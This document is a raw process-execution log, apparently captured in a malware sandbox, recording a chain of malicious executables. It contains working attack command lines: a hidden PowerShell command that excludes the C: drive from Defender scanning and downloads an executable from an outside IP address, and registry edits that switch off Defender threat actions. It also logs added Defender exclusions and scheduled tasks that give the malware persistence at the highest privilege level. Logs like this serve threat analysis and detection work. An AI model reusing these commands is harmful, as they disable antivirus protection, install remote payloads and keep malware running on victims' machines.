"C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\KKUS33HVT.7z -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\4A6CA328-7888-3279-B672-D1D9D0A46EE2
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 LG" /sc ONLOGON /rl HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 LG" /sc ONLOGON /rl HIGHEST
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5168 -ip 5168
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 960
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5168 -ip 5168
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 1596
C:\Users\Admin\Desktop\a\victor.exe
"C:\Users\Admin\Desktop\a\victor.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5060 -ip 5060
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 232
C:\Users\Admin\Desktop\a\RambledMime.exe
"C:\Users\Admin\Desktop\a\RambledMime.exe"
C:\Users\Admin\Desktop\a\current.exe
"C:\Users\Admin\Desktop\a\current.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\Desktop\a\host_so.exe
"C:\Users\Admin\Desktop\a\host_so.exe"
C:\Users\Admin\Desktop\a\mixinte.exe
"C:\Users\Admin\Desktop\a\mixinte.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Users\Admin\Desktop\a\inte.exe
"C:\Users\Admin\Desktop\a\inte.exe"
C:\Users\Admin\Desktop\a\winlogon.exe
"C:\Users\Admin\Desktop\a\winlogon.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " WindowStyle -Hidden Add-MpPreference -ExclusionPath 'C:\' -Force [Net.ServicePointManager]::SecurityProtocol = 'Tls, Tls11, Tls12, Ssl3' $DownloadUrl = 'http://49.13.194.118/ADServices.exe' $WebResponse = Invoke-WebRequest -Uri $DownloadUrl -Method Head Write-Output 'Downloading $DownloadUrl' Start-BitsTransfer -Source $WebResponse.BaseResponse.ResponseUri.AbsoluteUri.Replace('%20', ' ') -Destination 'C:\\Windows\\Temp\\'"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV2663_0cc175b9c0f1b6a831c399e269772661\MSIUpdaterV2663.exe" /tn "MSIUpdaterV2663_0cc175b9c0f1b6a831c399e269772661 HR" /sc HOURLY /rl HIGHEST
C:\Users\Admin\AppData\Local\Temp\spanaY6dQFnxKCva\Nccj2wTDtt7ya4Fn9vLo.exe
"C:\Users\Admin\AppData\Local\Temp\spanaY6dQFnxKCva\Nccj2wTDtt7ya4Fn9vLo.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV2663_0cc175b9c0f1b6a831c399e269772661\MSIUpdaterV2663.exe" /tn "MSIUpdaterV2663_0cc175b9c0f1b6a831c399e269772661 LG" /sc ONLOGON /rl HIGHEST
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 7420 -ip 7420
C:\Users\Admin\Desktop\a\setup.exe
"C:\Users\Admin\Desktop\a\setup.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7420 -s 684
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\Desktop\a\file300un.exe
"C:\Users\Admin\Desktop\a\file300un.exe"
C:\Users\Admin\AppData\Local\Temp\7zS59CA.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\spanIHEAubj07gZf\auehhQxGFTG53UPDyJn4.exe
"C:\Users\Admin\AppData\Local\Temp\spanIHEAubj07gZf\auehhQxGFTG53UPDyJn4.exe"
C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe
.\Install.exe /yrVdidRYRgn "385118" /S
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Users\Admin\Desktop\a\buildjudit.exe
"C:\Users\Admin\Desktop\a\buildjudit.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe
"C:\Users\Admin\Desktop\a\buildjudit.exe"
C:\Users\Admin\Desktop\a\lumma1234.exe
"C:\Users\Admin\Desktop\a\lumma1234.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Users\Admin\Desktop\a\go.exe
"C:\Users\Admin\Desktop\a\go.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\Desktop\a\random.exe
"C:\Users\Admin\Desktop\a\random.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Users\Admin\Desktop\a\33333.exe
"C:\Users\Admin\Desktop\a\33333.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\system32\tasklist.exe
tasklist
C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe
"C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe"
C:\Users\Admin\Pictures\n5iRSINSSBZXYf0VMxnR1Gr6.exe
"C:\Users\Admin\Pictures\n5iRSINSSBZXYf0VMxnR1Gr6.exe" /s
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Users\Admin\Pictures\U3mkXHCrBXb11u2lOpF29ovV.exe
"C:\Users\Admin\Pictures\U3mkXHCrBXb11u2lOpF29ovV.exe"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718
C:\Users\Admin\Desktop\a\lenin.exe
"C:\Users\Admin\Desktop\a\lenin.exe"
C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe
"C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe"
C:\Users\Admin\Pictures\RTyv5hQ34rQUelr1Ahzlcifr.exe
"C:\Users\Admin\Pictures\RTyv5hQ34rQUelr1Ahzlcifr.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5676 -ip 5676
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5676 -s 272
C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"
C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718
C:\Users\Admin\AppData\Local\Temp\7zSC3AF.tmp\Install.exe
.\Install.exe
C:\Users\Admin\Desktop\a\alex.exe
"C:\Users\Admin\Desktop\a\alex.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k copy Albany Albany.cmd & Albany.cmd & exit
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe" -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\Desktop\a\well.exe
"C:\Users\Admin\Desktop\a\well.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 2316
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "mixinte.exe" /f & erase "C:\Users\Admin\Desktop\a\mixinte.exe" & exit
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:3
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:8
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 16:39:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe\" PP /XafdidFSQl 385118 /S" /V1 /F
C:\Users\Admin\Desktop\a\swizzzz.exe
"C:\Users\Admin\Desktop\a\swizzzz.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,3796333605691665801,14238465934583101331,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,3796333605691665801,14238465934583101331,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3668 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\1000047001\file300un.exe
"C:\Users\Admin\AppData\Local\Temp\1000047001\file300un.exe"
C:\Users\Admin\Desktop\a\sarra.exe
"C:\Users\Admin\Desktop\a\sarra.exe"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3568 /prefetch:1
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "mixinte.exe" /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 9156 -ip 9156
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7924 -s 920
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9156 -s 1704
C:\Users\Admin\Desktop\a\228.exe
"C:\Users\Admin\Desktop\a\228.exe"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"
C:\Users\Admin\Desktop\a\fileosn.exe
"C:\Users\Admin\Desktop\a\fileosn.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Descriptions Descriptions.cmd & Descriptions.cmd & exit
C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn btZaCbGShXZoJDfvCg
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Users\Admin\Desktop\a\amers.exe
"C:\Users\Admin\Desktop\a\amers.exe"
C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe
"C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe"
\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn btZaCbGShXZoJDfvCg
C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe PP /XafdidFSQl 385118 /S
C:\Users\Admin\Desktop\a\gold.exe
"C:\Users\Admin\Desktop\a\gold.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\Desktop\a\5.exe
"C:\Users\Admin\Desktop\a\5.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 8276 -ip 8276
C:\Users\Admin\Desktop\a\Newoff.exe
"C:\Users\Admin\Desktop\a\Newoff.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8276 -s 260
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Users\Admin\Documents\SimpleAdobe\uHNbZJI4JxwnevGgsCYWaO_A.exe
C:\Users\Admin\Documents\SimpleAdobe\uHNbZJI4JxwnevGgsCYWaO_A.exe
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\Desktop\a\Newoff.exe" /F
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
